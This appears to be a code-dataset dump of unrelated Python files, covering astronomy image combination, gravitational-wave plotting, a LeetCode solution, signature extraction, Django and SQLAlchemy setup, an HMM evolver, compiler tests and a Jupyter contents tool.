outfits(image, header, outname=\"output.fits\"):\n \"\"\"\n Output .fits format image.\n\n Parameters\n ----------\n image : (float point?) array\n The combined image\n header : header object \n Header of the combined image\n outname : str\n Filename of the .fits output of the combined image\n \"\"\"\n hdu = fits.PrimaryHDU(data=np.abs(image), header=header)\n hdu.writeto(outname)\n\n\n\ndef freq_filling(im1, im2, hd1, hd2, hd3):\n \"\"\"\n Derive spectral index from image array, and make interpolation.\n\n Parameters\n ----------\n im1,im2 : float array\n The input images to be interpolated\n hd1, hd2 : header object\n Headers of the input images\n hd3 : header object\n Header for extracting the targeted frequency for interpolation\n \"\"\"\n interpol = im1\n interpol_header = hd1\n interpol_hdu = fits.PrimaryHDU(data=np.abs(im1), header=hd1)\n\n return interpol, interpol_header, interpol_hdu\n\n\n\n#################################################################\n\ndef AKB_interpol(lores1, lores2, hires,\n extnum1=0,\n extnum2=0,\n hiresextnum=0,\n scalefactor1=1.0, \n scalefactor2=1.0, \n output_fits=True,\n outfitsname='interpolate.fits'):\n \"\"\"\n This procedure is provided for the case that we need to interpolate\n two space observatory image, to make the image at the observing \n frequency of the ground based one.\n \n Parameter\n ---------\n lores1, lores2 : str\n Filaname of the input images, either variable name of HDUs, or\n can be the .fits format files. lores2 should be at the lower observing\n frequency.\n hires : str\n Filaname of the groundbased observing image. This is to supply header\n for obtaining the targeted frequency for interpolation.\n extnum1,2 : int\n The extension number to use from the low-res FITS file\n hiresextnum : int\n The extension number to use from the hi-res FITS file\n scalefactor1,2 : float\n scaling factors of the input images.\n fitsoutput : bool\n Option to set whether we have .fits output\n outfitsname : str\n The filename of .fits output.\n\n Return\n ---------\n lores : HDU object\n The interpolated image.\n \"\"\"\n\n # Read images\n hdu1, im1, hd1 = file_in(lores1, extnum1)\n hdu2, im2, hd2 = file_in(lores2, extnum2)\n hdu3, im3, hd3 = file_in(hires, hiresextnum)\n\n # Match flux unit\n im1, hd1 = flux_unit(im1, hd1)\n im2, hd2 = flux_unit(im2, hd2)\n\n # Smooth the high resolution image to the low resolution one\n # Here need to reead the header of the low resolution image, \n # to know what is the targeted resolution\n targres = 0.0\n im1 = smoothing(im1, targres)\n\n #* Image Registration (Match astrometry)\n # [Should be an optional step]\n # The initial offsets between images should not be too big. Otherwise \n # the correlation might be trapped to a local maximum.\n # Package exist, but not sure how to use it.\n\n # Derive Spectral index and Make interpolation\n interpol, interpol_header, interpol_hdu = freq_filling(im1, im2, hd1, hd2, hd3) \n\n # output .fits file\n if output_fits:\n outfits(interpol, interpol_header, outname=outfitsname)\n\n # return hdu\n return interpol_hdu\n\n#################################################################\n\ndef AKB_combine(hires, lores,\n highresextnum=0,\n lowresextnum=0,\n highresscalefactor=1.0,\n lowresscalefactor=1.0, \n lowresfwhm=1*u.arcmin,\n targres = -1.0,\n return_hdu=False,\n return_regridded_lores=False, output_fits=True):\n \"\"\"\n Fourier combine two data cubes\n\n Parameters\n ----------\n highresfitsfile : str\n The high-resolution FITS file\n lowresfitsfile : str\n The low-resolution (single-dish) FITS file\n highresextnum : int\n The extension number to use from the high-res FITS file\n highresscalefactor : float\n lowresscalefactor : float\n A factor to multiply the high- or low-resolution data by to match the\n low- or high-resolution data\n lowresfwhm : `astropy.units.Quantity`\n The full-width-half-max of the single-dish (low-resolution) beam;\n or the scale at which you want to try to match the low/high resolution\n data\n return_hdu : bool\n Return an HDU instead of just an image. It will contain two image\n planes, one for the real and one for the imaginary data.\n return_regridded_cube2 : bool\n Return the 2nd cube regridded into the pixel space of the first?\n \"\"\"\n\n #* Input data\n hdu1, im1, hd1 = file_in(hires, highresextnum)\n hdu2, im2raw, hd2 = file_in(lores, lowresextnum)\n\n # load default parameters (primary beam, the simultaneous FOV of the ground\n # based observations)\n # Ke Wang part. Need to think about which is the best way of doing this.\n # Here better to get the resolution information into the header (bmaj, bmin),\n # if it isn't there.\n\n #* Match flux unit (convert all possible units to un-ambiguous unit like Jy/pixel or Jy/arcsec^2)\n im1, hd1 = flux_unit(im1, hd1)\n im2raw, hd2 = flux_unit(im2raw, hd2)\n\n # Regrid the low resolution image to the same pixel scale and\n # field of view of the high resolution image\n hdu2, im2, nax1, nax2, pixscale = regrid(hd1, im1, im2raw, hd2)\n\n #* Image Registration (Match astrometry)\n # [Should be an optional step]\n # The initial offsets between images should not be too big. Otherwise \n # the correlation might be trapped to a local maximum.\n # Package exist, but not sure how to use it.\n\n # Fourier transform the images\n fft1 = np.fft.fft2(np.nan_to_num(im1*highresscalefactor))\n fft2 = np.fft.fft2(np.nan_to_num(im2*lowresscalefactor))\n\n #* Correct for the primary beam attenuation in fourier domain\n fft2 = pbcorr(fft2, hd1, hd2)\n\n #* flux matching [Use space observatory image to determine absolute flux]\n # [should be an optional step]\n fft1 = flux_match(fft1, fft2)\n\n # Constructing weight kernal (normalized to max=1)\n kernel2, kernel1 = feather_kernel(nax2, nax1, lowresfwhm, pixscale)\n\n #* Combine images in the fourier domain\n fftsum, combo = fftmerge(kernel1, kernel2, fft1, fft2)\n\n #* Final Smoothing\n # [should be an optional step]\n if (targres > 0.0):\n combo = smoothing(combo, targres)\n\n #* generate amplitude plot and PDF output\n akb_plot(fft1, fft2, fftsum)\n \n #* Generate the CASA 4.3 compatible header\n combo_header = casaheader(hdu1.header)\n\n # fits output\n if output_fits:\n outfits(combo, combo_header)\n\n # Return combined image array(s)\n if return_regridded_lores:\n return combo, hdu2\n else:\n return combo\n\n#################################################################\n\n\n\n# example\n# os.system(\"rm -rf output.fits\")\n# f = AKB_combine(\"faint_final.shift.fix.fits\",\"Dragon.im350.crop.fits\", lowresscalefactor=0.0015,return_hdu=True)\n\nos.system(\"rm -rf output.fits\")\nos.system(\"rm -rf interpolate.fits\")\ninterpol_hdu = AKB_interpol(\"Dragon.im350.crop.fits\", \"Dragon.im350.crop.fits\", \"faint_final.shift.fix.fits\")\nf = AKB_combine(\"faint_final.shift.fix.fits\",interpol_hdu, lowresscalefactor=0.0015,return_hdu=True)\n","sub_path":"uvcombine.py","file_name":"uvcombine.py","file_ext":"py","file_size_in_byte":15535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"195095449","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import signal\nfrom sklearn.decomposition import PCA\n\ndef read_data(index):\n\n f = open('CBC Data/Gain0.001/signal' + str(index) + '.dat', 'r')\n\n lines = f.read().split('\\n')\n l = lines.__len__() - 1\n time = np.zeros(l)\n wave_data = np.zeros(l)\n noise_data = np.zeros(l)\n\n for i in range(0, l):\n time[i] = float(lines[i].split(' ')[0])\n wave_data[i] = float(lines[i].split(' ')[1])\n\n f.close()\n\n f = open('CBC Data/Gain0.001/noise' + str(index) + '.dat', 'r')\n lines = f.read().split('\\n')\n for i in range(0, l):\n noise_data[i] = float(lines[i].split(' ')[1])\n\n f.close()\n\n return time, wave_data, noise_data\n\n\n\ntime, wave_data, noise_data = read_data(np.random.randint(1,138))\n\n\nsampF = 1/(time[1]-time[0])\n\nplt.figure(1)\nplt.plot(time, wave_data- noise_data)\nplt.xlabel('Time (s)')\nplt.ylabel('Strain')\nplt.grid(True,'both')\nplt.draw()\n\nf, t, Sxx = signal.spectrogram(wave_data, sampF, 'hann', 100, 90)\n\nplt.figure(2)\nplt.pcolormesh(t, f, np.log10(Sxx))\nplt.ylabel('Frequency (Hz)')\nplt.xlabel('Time (sec)')\nplt.yscale('log')\nplt.ylim([10, 10**3])\nplt.draw()\n\nf, t, Sxx = signal.spectrogram(noise_data, sampF, 'hann', 100, 90)\n\nplt.figure(3)\nplt.pcolormesh(t, f, np.log10(Sxx))\nplt.ylabel('Frequency (Hz)')\nplt.xlabel('Time (sec)')\nplt.yscale('log')\nplt.ylim([10, 10**3])\nplt.draw()\n\nplt.figure(4)\nf, P1 = signal.welch(wave_data, fs=sampF, nperseg=4096/4)\nplt.loglog(f, P1)\nf, P2 = signal.welch(noise_data, fs=sampF, nperseg=4096/4)\nplt.loglog(f, P2)\n\n# plt.xlim([10, 10**3])\nplt.xlabel('Frequency [Hz]')\nplt.ylabel('PSD [strain^2/Hz]')\nplt.grid(True,'both')\nplt.draw()\n\n# x_train = np.concatenate((P1, P2)).reshape(-1,1)\n#\n# pca = PCA(n_components=2).fit(x_train.T)\n#\n# plt.figure(5)\n#\n# for i in range(len(x_train)/2):\n# plt.plot(pca.transform(x_train)[i, 0], pca.transform(x_train)[i, 1], '.')\n#\n# for i in range(len(x_train) / 2,len(x_train)):\n# plt.plot(pca.transform(x_train)[i, 0], pca.transform(x_train)[i, 1], 'o')\n#\n# plt.xlabel('Component 1')\n# plt.ylabel('Component 2')\n# plt.draw()\n\nplt.show()\n","sub_path":"plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"417282650","text":"#\n# @lc app=leetcode id=461 lang=python\n#\n# [461] Hamming Distance\n#\n# https://leetcode.com/problems/hamming-distance/description/\n#\n# algorithms\n# Easy (70.76%)\n# Likes: 1437\n# Dislikes: 138\n# Total Accepted: 267.5K\n# Total Submissions: 377.9K\n# Testcase Example: '1\\n4'\n#\n# The Hamming distance between two integers is the number of positions at which\n# the corresponding bits are different.\n# \n# Given two integers x and y, calculate the Hamming distance.\n# \n# Note:\n# 0 ≤ x, y < 2^31.\n# \n# \n# Example:\n# \n# Input: x = 1, y = 4\n# \n# Output: 2\n# \n# Explanation:\n# 1 (0 0 0 1)\n# 4 (0 1 0 0)\n# ⁠ ↑ ↑\n# \n# The above arrows point to positions where the corresponding bits are\n# different.\n# \n# \n#\n\n# @lc code=start\nclass Solution(object):\n def hammingDistance(self, x, y):\n \"\"\"\n :type x: int\n :type y: int\n :rtype: int\n \"\"\"\n # return bin(x ^ y).count('1')\n \n n = x ^ y\n ans = 0\n # while n&0xffffffff != 0:\n # ans += 1\n # n = n & (n-1) \n\n while n:\n if n & 1 == 1:\n ans += 1\n n = n>>1\n return ans \n \n\n# @lc code=end\n\n","sub_path":"Python/461.hamming-distance.py","file_name":"461.hamming-distance.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"506350688","text":"# Sebastian Staszczyk\n\ntab = [1, 2, 3, 4, 5, 6, 7, 8]\n\nparity_check = lambda number: number % 2 == 0\n\nfilter_numbers = filter(parity_check, tab)\n\nfor el in filter_numbers:\n print(el)","sub_path":"04-Subroutines/After class/Zad 40 - Filtrowanie danych.py","file_name":"Zad 40 - Filtrowanie danych.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"67372335","text":"import num\nimport speech\nfrom num2words import num2words\ndef retop(text,a,b):\n\ttry:\n\t\treturn{\n\t\t\t\"into \":a*b,\n\t\t\t\"by \":a/b,\n\t\t\t\"plus \":a+b,\n\t\t\t\"minus \":a-b,\n\t\t\t\"multiplied by \":a*b,\n\t\t\t\"times \":a*b,\n\t\t\t\"divided by \":a/b\n\t\t}[text]\n\texcept:\n\t\tspeech.say(\"Sorry. but i ain't capable of doing the operation\")\ndef find(text):\n\ttext=num.text2int(text)\n\tfin=text.split()\n\ta=int(fin[0])\n\tb=int(fin[-1])\n\tc=''\n\tfor i in range(1,len(fin)-1):\n\t\tc+=str(fin[i])\n\t\tc+=\" \"\n\tst=str(text)+' = '+str(num2words(retop(c,a,b)))\n\tspeech.say(st)\nif __name__==\"__main__\":\n\tfind('5 multiplied by 2')","sub_path":"calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"149548049","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: /Users/adam/code/talon/talon/signature/extraction.py\n# Compiled at: 2015-07-20 12:14:52\nimport os, logging, regex as re\nfrom PyML import SparseDataSet\nfrom talon.constants import RE_DELIMITER\nfrom talon.signature.constants import SIGNATURE_MAX_LINES, TOO_LONG_SIGNATURE_LINE\nfrom talon.signature.learning.featurespace import features, build_pattern\nfrom talon.utils import get_delimiter\nfrom talon.signature.bruteforce import get_signature_candidate\nfrom talon.signature.learning.helpers import has_signature\nlog = logging.getLogger(__name__)\nEXTRACTOR = None\nRE_REVERSE_SIGNATURE = re.compile('\\n# signature should consists of blocks like this\\n(?:\\n # it could end with empty line\\n e*\\n # there could be text lines but no more than 2 in a row\\n (te*){,2}\\n # every block should end with signature line\\n s\\n)+\\n', re.I | re.X | re.M | re.S)\n\ndef is_signature_line(line, sender, classifier):\n \"\"\"Checks if the line belongs to signature. Returns True or False.\"\"\"\n data = SparseDataSet([build_pattern(line, features(sender))])\n return classifier.decisionFunc(data, 0) > 0\n\n\ndef extract(body, sender):\n \"\"\"Strips signature from the body of the message.\n\n Returns stripped body and signature as a tuple.\n If no signature is found the corresponding returned value is None.\n \"\"\"\n try:\n delimiter = get_delimiter(body)\n body = body.strip()\n if has_signature(body, sender):\n lines = body.splitlines()\n markers = _mark_lines(lines, sender)\n text, signature = _process_marked_lines(lines, markers)\n if signature:\n text = delimiter.join(text)\n if text.strip():\n return (text, delimiter.join(signature))\n except Exception as e:\n log.exception('ERROR when extracting signature with classifiers')\n\n return (\n body, None)\n\n\ndef _mark_lines(lines, sender):\n \"\"\"Mark message lines with markers to distinguish signature lines.\n\n Markers:\n\n * e - empty line\n * s - line identified as signature\n * t - other i.e. ordinary text line\n\n >>> mark_message_lines(['Some text', '', 'Bob'], 'Bob')\n 'tes'\n \"\"\"\n global EXTRACTOR\n candidate = get_signature_candidate(lines)\n markers = bytearray('t' * len(lines))\n for i, line in reversed(list(enumerate(candidate))):\n j = len(lines) - len(candidate) + i\n if not line.strip():\n markers[j] = 'e'\n elif is_signature_line(line, sender, EXTRACTOR):\n markers[j] = 's'\n\n return markers\n\n\ndef _process_marked_lines(lines, markers):\n \"\"\"Run regexes against message's marked lines to strip signature.\n\n >>> _process_marked_lines(['Some text', '', 'Bob'], 'tes')\n (['Some text', ''], ['Bob'])\n \"\"\"\n signature = RE_REVERSE_SIGNATURE.match(markers[::-1])\n if signature:\n return (lines[:-signature.end()], lines[-signature.end():])\n else:\n return (\n lines, None)","sub_path":"pycfiles/clawpack-5.6.1.tar/extraction.py","file_name":"extraction.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"534447192","text":"from rest_framework import serializers\n\nfrom likes import services as likes_services\nfrom ..models import TopHeadline\n\n\nclass TopHeadlineSerializer(serializers.ModelSerializer):\n is_fan = serializers.SerializerMethodField()\n\n class Meta:\n model = TopHeadline\n fields = (\n 'id',\n 'title',\n 'author',\n 'description',\n 'url',\n 'urlToImage',\n 'publishedAt',\n 'is_fan',\n 'total_likes',\n )\n\n def get_is_fan(self, obj) -> bool:\n user = self.context.get('request').user\n return likes_services.is_fan(obj, user)\n","sub_path":"4term/PyDjangoWebsite/news/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"577614797","text":"import yaml \nfrom os.path import isfile\nfrom contextlib import contextmanager\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nfrom sqlalchemy.ext.declarative import declarative_base\n\nconfig_path = '/opt/application/config'\nconfig_file = '%s/database.yml' % config_path \n\nif isfile(config_file):\n with open(config_file, 'r') as file:\n conn_info = yaml.load(file.read())\nelse:\n raise SystemExit(conn_info)\ndb_conf = conn_info[0]\nengine = create_engine('%s://%s:%s@%s/%s?charset=utf8' % (db_conf['engine'], db_conf['db_user'], db_conf['db_pass'], db_conf['host'], db_conf['db_name']))\n\nBase = declarative_base() \nsession = scoped_session(sessionmaker())\nsession.configure(bind=engine)\n\n@contextmanager\ndef session_scope():\n try:\n yield session\n session.commit()\n except:\n session.rollback()\n raise\n finally:\n session.close()\n","sub_path":"models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"574411858","text":"\"\"\"\nHidden Markov Model Evolver\n\nUsage:\n hmm_evolve.py [-h] [--generations GENERATIONS] [--population POPULATION]\n [--mu MUTATION_RATE] [--bottleneck BOTTLENECK] [--processes PROCESSORS]\n [--output OUTPUT_FILE] [--objective OBJECTIVE] [--repetitions REPETITIONS]\n [--turns TURNS] [--noise NOISE] [--nmoran NMORAN]\n [--states NUM_STATES] [--algorithm ALGORITHM]\n\nOptions:\n -h --help Show help\n --generations GENERATIONS Generations to run the EA [default: 500]\n --population POPULATION Population size [default: 40]\n --mu MUTATION_RATE Mutation rate [default: 0.1]\n --bottleneck BOTTLENECK Number of individuals to keep from each generation [default: 10]\n --processes PROCESSES Number of processes to use [default: 1]\n --output OUTPUT_FILE File to write data to [default: hmm_params.csv]\n --objective OBJECTIVE Objective function [default: score]\n --repetitions REPETITIONS Repetitions in objective [default: 100]\n --turns TURNS Turns in each match [default: 200]\n --noise NOISE Match noise [default: 0.00]\n --nmoran NMORAN Moran Population Size, if Moran objective [default: 4]\n --states NUM_STATES Number of FSM states [default: 5]\n --algorithm ALGORITHM Which algorithm to use (EA for evolutionary algorithm or PS for\n particle swarm algorithm) [default: EA]\n\"\"\"\n\nfrom docopt import docopt\n\nfrom axelrod_dojo import HMMParams, Population, prepare_objective\nfrom axelrod_dojo.algorithms.particle_swarm_optimization import PSO\n\n\nif __name__ == '__main__':\n arguments = docopt(__doc__, version='HMM Evolver 0.3')\n print(arguments)\n processes = int(arguments['--processes'])\n\n # Vars for the genetic algorithm\n population = int(arguments['--population'])\n mutation_probability = float(arguments['--mu'])\n generations = int(arguments['--generations'])\n bottleneck = int(arguments['--bottleneck'])\n output_filename = arguments['--output']\n\n # Objective\n name = str(arguments['--objective'])\n repetitions = int(arguments['--repetitions'])\n turns = int(arguments['--turns'])\n noise = float(arguments['--noise'])\n nmoran = int(arguments['--nmoran'])\n\n # HMM\n num_states = int(arguments['--states'])\n params_kwargs = {\"num_states\": num_states}\n\n if arguments['--algorithm'] == \"PS\":\n objective = prepare_objective(name, turns, noise, repetitions, nmoran)\n pso = PSO(HMMParams, params_kwargs, objective=objective,\n population=population, generations=generations,\n size=num_states)\n\n xopt_helper, fopt = pso.swarm()\n xopt = HMMParams(num_states=num_states)\n xopt.read_vector(xopt_helper, num_states)\n else:\n objective = prepare_objective(name, turns, noise, repetitions, nmoran)\n population = Population(HMMParams, params_kwargs, population, objective,\n output_filename, bottleneck, mutation_probability,\n processes=processes)\n population.run(generations)\n \n # Get the best member of the population to output.\n scores = population.score_all()\n record, record_holder = 0, -1\n for i, s in enumerate(scores):\n if s >= record:\n record = s\n record_holder = i\n xopt, fopt = population.population[record_holder], record\n \n print(\"Best Score: {} {}\".format(fopt, xopt))\n","sub_path":"bin/hmm_evolve.py","file_name":"hmm_evolve.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"91417619","text":"#!/usr/bin/python3\n\nimport pytest\nimport solcx\n\n\nfrom brownie import config\nfrom brownie.project import build, compiler, sources\nfrom brownie.exceptions import CompilerError, ContractExists\n\nsources = sources.Sources()\n\n\n@pytest.fixture(scope=\"function\")\ndef version():\n yield\n config['solc']['version'] = \"v0.5.7\"\n compiler.set_solc_version()\n\n\ndef _solc_5_source():\n source = sources['BrownieTester']\n source = source.replace('BrownieTester', 'TempTester')\n source = source.replace('UnlinkedLib', 'TestLib')\n return source\n\n\ndef _solc_4_source():\n source = _solc_5_source()\n source = source.replace('payable ', '')\n source = source.replace('^0.5.0', '^0.4.25')\n return source\n\n\ndef test_build_keys():\n build_json = compiler.compile_contracts([\"contracts/BrownieTester.sol\"])\n assert set(build.BUILD_KEYS) == set(build_json['BrownieTester'])\n\n\ndef test_contract_exists():\n with pytest.raises(ContractExists):\n compiler.compile_source(sources['BrownieTester'])\n compiler.compile_contracts([\"contracts/BrownieTester.sol\"])\n\n\ndef test_set_solc_version(version):\n config['solc']['version'] = \"v0.5.0\"\n compiler.set_solc_version()\n assert config['solc']['version'] == solcx.get_solc_version_string().strip('\\n')\n\n\ndef test_unlinked_libraries(version):\n source = _solc_5_source()\n build_json = compiler.compile_source(source)\n assert '__TestLib__' in build_json['TempTester']['bytecode']\n config['solc']['version'] = \"v0.4.25\"\n compiler.set_solc_version()\n source = _solc_4_source()\n build_json = compiler.compile_source(source)\n assert '__TestLib__' in build_json['TempTester']['bytecode']\n\n\ndef test_compiler_errors(version):\n with pytest.raises(CompilerError):\n compiler.compile_contracts([\"contracts/Token.sol\"])\n compiler.compile_contracts([\"contracts/Token.sol\", \"contracts/SafeMath.sol\"])\n source = _solc_4_source()\n with pytest.raises(CompilerError):\n compiler.compile_source(source)\n config['solc']['version'] = \"v0.4.25\"\n compiler.set_solc_version()\n compiler.compile_source(source)\n","sub_path":"tests/project/compiler_test.py","file_name":"compiler_test.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"571162438","text":"# -*- coding: utf-8 -*-\n#\n# ramstk.modules.RAMSTKDataController.py is part of the RAMSTK Project\n#\n# All rights reserved.\n# Copyright 2007 - 2017 Doyle Rowland doyle.rowland reliaqual com\n\"\"\"Datamodels Package RAMSTKDataController.\"\"\"\n\nfrom pubsub import pub # pylint: disable=E0401\n\n__author__ = 'Doyle Rowland'\n__email__ = 'doyle.rowland@reliaqual.com'\n__organization__ = 'ReliaQual Associates, LLC'\n__copyright__ = 'Copyright 2017 Doyle \"weibullguy\" Rowland'\n\n\nclass RAMSTKDataController(object):\n \"\"\"\n Provide an interface between data models and RAMSTK views.\n\n This is the meta-class for all RAMSTK data controllers.\n\n :ivar _configuration: the :class:`ramstk.Configuration.Configuration`\n instance associated with the current RAMSTK instance.\n :ivar _dtm_data_model: the RAMSTKDataModel associated with the\n RAMSTKDataController.\n :ivar bool _test: indicates whether or not Data Controller is being tested.\n used to suppress pypubsub sending messages when running\n tests.\n \"\"\"\n\n def __init__(self, configuration, **kwargs):\n \"\"\"\n Initialize a RAMSTKDataController instance.\n\n :param configuration: the Configuration instance associated with the\n current instance of the RAMSTK application.\n :type configuration: :class:`ramstk.Configuration.Configuration`\n :keyword model: the RAMSTKDataModel() to associate.\n :ramstk_module: the all lowercase name of the RAMSTK Module the Data\n Controller is for.\n \"\"\"\n # Initialize private dictionary attributes.\n\n # Initialize private list attributes.\n\n # Initialize private scalar attributes.\n self._configuration = configuration\n self._dtm_data_model = kwargs['model']\n self._test = kwargs['test']\n\n self._module = None\n for __, char in enumerate(kwargs['ramstk_module']):\n if char.isalpha():\n self._module = kwargs['ramstk_module'].capitalize()\n\n # Initialize public dictionary attributes.\n\n # Initialize public list attributes.\n\n # Initialize public scalar attributes.\n\n def do_handle_results(self, error_code, error_msg, pub_msg=None):\n \"\"\"\n Handle the error code and error message from other methods.\n\n This methods processes the error code and error message from the\n insert, delete, update, and calculate methods.\n\n :param int error_code: the error code returned by the Data Model when\n requested to insert.\n :param str error_msg: the error message returned by the Data Model when\n requested to insert.\n :param str pub_msg: the message to be published by pypubsub.\n :return: False if successful or True if an error is encountered.\n :rtype: bool\n \"\"\"\n _return = False\n\n # If the insert, delete, update, or calculation was successful log the\n # error message to the user log. Otherwise, log it to the debug log.\n if error_code == 0:\n self._configuration.RAMSTK_USER_LOG.info(error_msg)\n\n if pub_msg is not None and not self._test:\n pub.sendMessage(pub_msg)\n else:\n self._configuration.RAMSTK_DEBUG_LOG.error(error_msg)\n _return = True\n\n return _return\n\n def request_do_select(self, node_id, **kwargs):\n \"\"\"\n Request the RAMSTK Program database record associated with Node ID.\n\n :param int node_id: the Node ID to retrieve from the Tree.\n :return: the RAMSTK Program database record requested.\n \"\"\"\n return self._dtm_data_model.do_select(node_id, **kwargs)\n\n def request_do_select_all(self, **kwargs):\n \"\"\"\n Retrieve the treelib Tree() from the Data Model.\n\n :return: tree; the treelib Tree() of RAMSTKRequirement models in the\n Requirement tree.\n :rtype: dict\n \"\"\"\n return self._dtm_data_model.do_select_all(**kwargs)\n\n def request_get_attributes(self, node_id):\n \"\"\"\n Request attributes from the record associated with the Node ID.\n\n :param int node_id: the ID of the record in the RAMSTK Program\n database whose attributes are being\n requested.\n :return: _attributes\n :rtype: dict\n \"\"\"\n _entity = self.request_do_select(node_id)\n\n return _entity.get_attributes()\n\n def request_set_attributes(self, node_id, attributes):\n \"\"\"\n Set the attributes of the record associated with the Node ID.\n\n :param int node_id: the ID of the record in the RAMSTK Program database\n table whose attributes are to be set.\n :param dict attributes: the dictionary of attributes and values.\n :return: (_error_code, _msg); the error code and associated message.\n :rtype: (int, str)\n \"\"\"\n _entity = self.request_do_select(node_id)\n\n return _entity.set_attributes(attributes)\n\n def request_last_id(self, **kwargs): # pylint: disable=unused-argument\n \"\"\"\n Request the last entity ID used in the RAMSTK Program database.\n\n :return: the last entity ID used.\n :rtype: int\n \"\"\"\n return self._dtm_data_model.last_id\n","sub_path":"src/ramstk/modules/RAMSTKDataController.py","file_name":"RAMSTKDataController.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"332021939","text":"\"\"\"\n\"\"\"\n\nimport argparse\nimport logging\nimport os\nimport json\nimport re\nimport time\n\n\ndef in_ipynb():\n \"\"\"\n Return True if this code is running in a Jupyter Notebook environment.\n \"\"\"\n try:\n return (str(type(get_ipython()))\n == \"\")\n except NameError:\n return False\n\nif in_ipynb():\n # In Jupyter Notebook, `logging` module's `basicConfig()` only works\n # after reloading.\n from importlib import reload\n reload(logging)\n\n\nlogging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s',\n datefmt='%d %b %H:%M:%S', level=logging.DEBUG)\n\n\ndef main():\n cline_args = parse_args() # Command LINE ARGumentS\n notebook = read_input(cline_args.filename)\n notebook_w_contents, contents_ls = gen_contents(notebook)\n write_output(cline_args.out_fname, notebook_w_contents, contents_ls)\n\n\ndef parse_args():\n \"\"\"\n Parse command line arguments to get input and output filenames.\n\n Called by:\n main\n \"\"\"\n parser = argparse.ArgumentParser(\n description=\"Add Table of Contents to Jupyter Notebook.\")\n\n parser.add_argument(\"filename\", type=str, help=\"Notebook directory\")\n parser.add_argument(\"-o\", \"--out_fname\", type=str, help=\"output filename\",\n default=\"toc_added_{}.ipynb\".format(\n time.ctime()).replace(\":\", \"-\"))\n\n return parser.parse_args()\n\n\ndef read_input(filename):\n \"\"\"\n Return:\n notebook (dict):\n JSON\n \"\"\"\n with open(filename) as f:\n notebook = json.load(f)\n return notebook\n\n\ndef gen_contents(notebook):\n \"\"\"\n Add contents cell\n add \"back to contents\" to notebook inplace\n \"\"\"\n contents_ls = [\"### Contents\\n\"]\n\n for cell_dict in notebook[\"cells\"]:\n source_ls = cell_dict[\"source\"]\n\n if (cell_dict[\"cell_type\"] == \"markdown\"\n and (source_ls[0].startswith(\"### \")\n or source_ls[0].startswith(\"#### \"))):\n add_entry(source_ls, contents_ls)\n\n if not source_ls[-1].endswith(\"\\n\"):\n source_ls[-1] += \"\\n\"\n source_ls.append(\"
    [Back to contents](#Contents)
    \")\n\n spaced_contents_ls = add_para_break(contents_ls)\n\n notebook[\"cells\"].insert(\n 1,\n {\"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": spaced_contents_ls,\n },\n )\n\n return notebook, spaced_contents_ls\n\n\ndef add_entry(md_ls, contents_ls):\n \"\"\"\n \"\"\"\n for heading_md in md_ls:\n heading_match = re.search(r\"^####? ([\\w ]+)\\n?$\", heading_md)\n if heading_match:\n heading_words = heading_match.group(1)\n\n if heading_md.startswith(\"### \"):\n prefix = \"* \"\n elif heading_md.startswith(\"#### \"):\n prefix = \" * \"\n\n bracket = \"[\" + heading_words + \"]\"\n paren = \"(#\" + \"-\".join(heading_words.split(\" \")) + \")\"\n suffix = \"\\n\"\n\n entry = prefix + bracket + paren + suffix\n contents_ls.append(entry)\n\n\ndef add_para_break(contents_ls):\n \"\"\"\n Return\n \"\"\"\n spaced_contents_ls = []\n for line in contents_ls:\n spaced_contents_ls.append(line)\n\n if (line.startswith(\"* \")\n and not spaced_contents_ls[-2].startswith(\"### Contents\")):\n for i in range(2):\n spaced_contents_ls.insert(-1, \"\\n\")\n\n return spaced_contents_ls\n\n\ndef write_output(out_fname, notebook, contents_ls):\n \"\"\"\n Write the formatted lines to output file.\n\n Called by:\n main\n \"\"\"\n with open(out_fname, \"w\") as f:\n json.dump(notebook, f)\n\n with open(out_fname + \".mdcontents.txt\", \"w\") as f:\n f.writelines(contents_ls)\n\n # logging.info(\"Output directory: {}\".format(os.getcwd()))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"=Utils/ipynb_contents/ipynb_contentsCopy.py","file_name":"ipynb_contentsCopy.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"340068485","text":"from flask import (\n Blueprint,\n request,\n # jsonify,\n session)\nfrom flask.views import MethodView\n\nfrom lib.global_func import (\n get_db,\n save_data_to_db,\n get_logger\n)\n\nfrom lib.models import (\n Project,\n project_name_length,\n project_description_length,\n)\n\n\napp = 